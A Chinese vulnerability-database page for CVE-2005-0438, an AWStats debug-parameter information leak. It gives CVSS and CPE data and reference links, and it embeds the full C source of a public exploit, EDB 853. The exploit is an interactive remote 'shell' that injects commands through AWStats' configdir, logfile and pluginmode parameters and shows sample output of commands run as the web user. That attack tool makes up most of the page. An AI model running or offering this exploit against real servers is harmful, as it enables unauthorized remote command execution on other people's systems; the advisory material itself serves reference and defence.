CVE-2005-0438
CVSS5.0
发布时间 :2005-05-02 00:00:00
修订时间 :2008-09-05 16:46:17
NMCOE    

[原文]awstats.pl in AWStats 6.3 and 6.4 allows remote attackers to obtain sensitive information by setting the debug parameter.


[CNNVD]AWStats漏洞(CNNVD-200505-649)

        AWStats 6.3和6.4中的awstats.pl使得远程攻击者可以通过设置调试参数来获取敏感信息。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:awstats:awstats:6.4
cpe:/a:awstats:awstats:6.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0438
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0438
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-649
(官方数据源) CNNVD

- 其它链接及资源

http://secunia.com/advisories/14299
(VENDOR_ADVISORY)  SECUNIA  14299
http://xforce.iss.net/xforce/xfdb/19477
(UNKNOWN)  XF  awstats-information-disclosure(19477)
http://www.securityfocus.com/archive/1/390368
(VENDOR_ADVISORY)  BUGTRAQ  20050214 AWStats <= 6.4 Multiple vulnerabilities

- 漏洞信息

AWStats漏洞
中危 未知
2005-05-02 00:00:00 2005-10-20 00:00:00
远程  
        AWStats 6.3和6.4中的awstats.pl使得远程攻击者可以通过设置调试参数来获取敏感信息。

- 公告与补丁

        暂无数据

- 漏洞信息 (853)

AWStats 5.7 - 6.2 Multiple Remote Exploit (extra) (EDBID:853)
cgi webapps
2005-03-02 Verified
0 omin0us
[点击下载] [点击下载]
/*
 * Awstats exploit "shell" 
 * code by omin0us
 * omin0us208 [at] gmail [dot] com
 * dtors security group
 * .:( http://dtors.ath.cx ):.
 *
 * Vulnerability reported by iDEFENSE
 * pluginmode bug has been found by GHC team.
 *
 * The awstats exploit that was discovered allows
 * a user to execute arbitrary commands on the 
 * remote server with the privileges of the httpd 
 *
 * This exploit combines all three methods of exploitation
 * and acts as a remote "shell", parsing all returned 
 * data to display command output and running in a loop
 * for continuous access.
 * 
 * bash-2.05b$ awstats_shell localhost                                     
 * Awstats 5.7 - 6.2 exploit Shell 0.1
 * code by omin0us
 * dtors security group
 * .: http://dtors.ath.cx :.
 * --------------------------------------
 * select exploit method:
 *        1. ?configdir=|cmd}
 *        2. ?update=1&logfile=|cmd|
 *        3. ?pluginmode=:system("cmd");
 *
 * method [1/2/3]? 1
 * starting shell...
 * (ctrl+c to exit)
 * sh3ll> id
 * uid=80(www) gid=80(www) groups=80(www)
 * DTORS_STOP
 * sh3ll> uname -a
 *
 * FreeBSD omin0us.dtors.ath.cx 4.8-RELEASE FreeBSD 4.8-RELEASE #3: Mon Oct 11 
 * 19:34:01 EDT 2004     omin0us@localhost:/usr/src/sys/compile/DTORS  i386
 * DTORS_STOP
 * sh3ll>
 *
 * this is licensed under the GPL
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT 80
#define CMD_BUFFER 512
#define IN_BUFFER 10000
#define MAGIC_START "DTORS_START"
#define MAGIC_STOP  "DTORS_STOP"

void usage(char *argv[]);

int main(int argc, char *argv[]){

	FILE *output;
	int sockfd;
	struct sockaddr_in addr;
	struct hostent *host;
	char *host_name=NULL, *awstats_dir=NULL;
	char cmd[CMD_BUFFER], cmd_url[CMD_BUFFER*3], incoming[IN_BUFFER], tmp, c, cli_opt;
	int i, j, flag, method, verbose=0;

	
	if(argc < 2){
		usage(argv);
	}
	
	printf("Awstats 5.7 - 6.2 exploit Shell 0.1\n");	
	printf("code by omin0us\n");
	printf("dtors security group\n");
	printf(".: http://dtors.ath.cx :.\n");
    printf("--------------------------------------\n");

	while(1){
		cli_opt = getopt(argc, argv, "h:d:v");

		if(cli_opt < 0)
			break;

		switch(cli_opt){
			case 'v':
				verbose = 1;
				break;
			case 'd':
				awstats_dir = optarg;
				break;
		}
	}

	if((optind >= argc) || (strcmp(argv[optind], "-") == 0)){
		printf("Please specify a Host\n");
		usage(argv);
	}

	if(!awstats_dir){
		awstats_dir = "/cgi-bin/awstats.pl";
	}
	
	printf("select exploit method:\n"
	       "\t1. ?configdir=|cmd}\n"
	       "\t2. ?update=1&logfile=|cmd|\n"
	       "\t3. ?pluginmode=:system(\"cmd\");\n");
	while(method != '1' && method != '2' && method != '3'){
		printf("\nmethod [1/2/3]? ");
		method = getchar();
	}

	printf("starting shell...\n(ctrl+c to exit)\n");
		
	
while(1){
	i=0;
	j=0;
	memset(cmd, 0, CMD_BUFFER);
	memset(cmd_url, 0, CMD_BUFFER*3);
	memset(incoming, 0, IN_BUFFER);
	
	if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
		printf("Error creating socket\n");
		exit(1);
	}

	if((host = gethostbyname(argv[optind])) == NULL){
		printf("Could not resolv host\n");
		exit(1);
	}

	addr.sin_family = AF_INET;
	addr.sin_port = htons(PORT);
	addr.sin_addr = *((struct in_addr *)host->h_addr);

	printf("sh3ll> ");
	fgets(cmd, CMD_BUFFER-1, stdin);
	
	if(verbose)	
		printf("Connecting to %s (%s)...\n", host->h_name, inet_ntoa(*((struct in_addr *)host->h_addr)));

	if( connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) != 0){
		printf("Count not connect to host\n");
		exit(1);
	}

	output = fdopen(sockfd, "a");
	setbuf(output, NULL);

	cmd[strlen(cmd)-1] = '\0';
	if(strlen(cmd) == 0){
		cmd[0]='i';
		cmd[1]='d';
		cmd[3]='\0';
	}

	for(i=0; i<strlen(cmd); i++){
		c = cmd[i];
		if(c == ' '){
			cmd_url[j++] = '%';
			cmd_url[j++] = '2';
			cmd_url[j++] = '0';
		}
		else{
			cmd_url[j++] = c;
		}
	}
	cmd_url[j] = '\0';

	if(method == '1'){
		if(verbose){
			printf("Sending Request\n");	
			printf("GET %s?configdir=|echo;echo+%s;%s;echo+%s;echo| HTTP/1.0\n\n", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP);
		}
	
		fprintf(output, "GET %s?configdir=|echo;echo+%s;%s;echo+%s;echo| HTTP/1.0\n\n", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP);
	}

	if(method == '2'){
		if(verbose){
			printf("Sending Request\n");
			printf("GET %s?update=1&logfile=|echo;echo+%s;%s;echo+%s;echo| HTTP/1.0\n\n", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP);
		}
		fprintf(output, "GET %s?update=1&logfile=|echo;echo+%s;%s;echo+%s;echo| HTTP/1.0\n\n", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP);
	}

	if(method == '3'){
		if(verbose){
			printf("Sending Request\n");
			printf("GET %s?pluginmode=:system(\"echo+%s;%s;echo+%s\"); HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Host: %s\n\n", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP, argv[optind]);
		}
		fprintf(output, "GET %s?pluginmode=:system(\"echo+%s;%s;echo+%s\"); HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Host: %s\n\n", awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP, argv[optind]);
	}


	i=0;
	while(strstr(incoming, MAGIC_START) == NULL){
		flag = read(sockfd, &tmp, 1);
		incoming[i++] = tmp;

		if(i >= IN_BUFFER){
			printf("flag [-] incoming buffer full\n");
			exit(1);
		}
		if(flag==0){
			printf("exploitation of host failed\n");
			exit(1);
		}
	}
	
	while(strstr(incoming, MAGIC_STOP) == NULL){
		read(sockfd,&tmp,1);
		incoming[i++] = tmp;
		putchar(tmp);
		if(i >= IN_BUFFER){
			printf("putchar [-] incoming buffer full\n");
			exit(1);
		}
	}
	printf("\n");
	
	shutdown(sockfd, SHUT_WR);
	close(sockfd);
	fclose(output);
	}
	return(0);
}

void usage(char *argv[]){
        printf("Usage: %s [options] <host>\n" , argv[0]);
        printf("Options:\n");
        printf("    -d <awstats_dir>     directory of awstats script\n");
        printf("                         '/cgi-bin/awstats.pl' is default\n");
        printf("                         if no directory is specified\n\n");
        printf("    -v                   verbose mode (optional)\n\n");
        printf("example: %s -d /stats/awstats.pl website.com\n\n", argv[0]);
        exit(1);
}	

// milw0rm.com [2005-03-02]
		

- 漏洞信息

13834
AWStats awstats.pl debug mode Information Disclosure
Information Disclosure
Loss of Confidentiality
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-02-14 Unknow
2005-02-14 Unknow

- 解决方案

Upgrade to version 6.4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站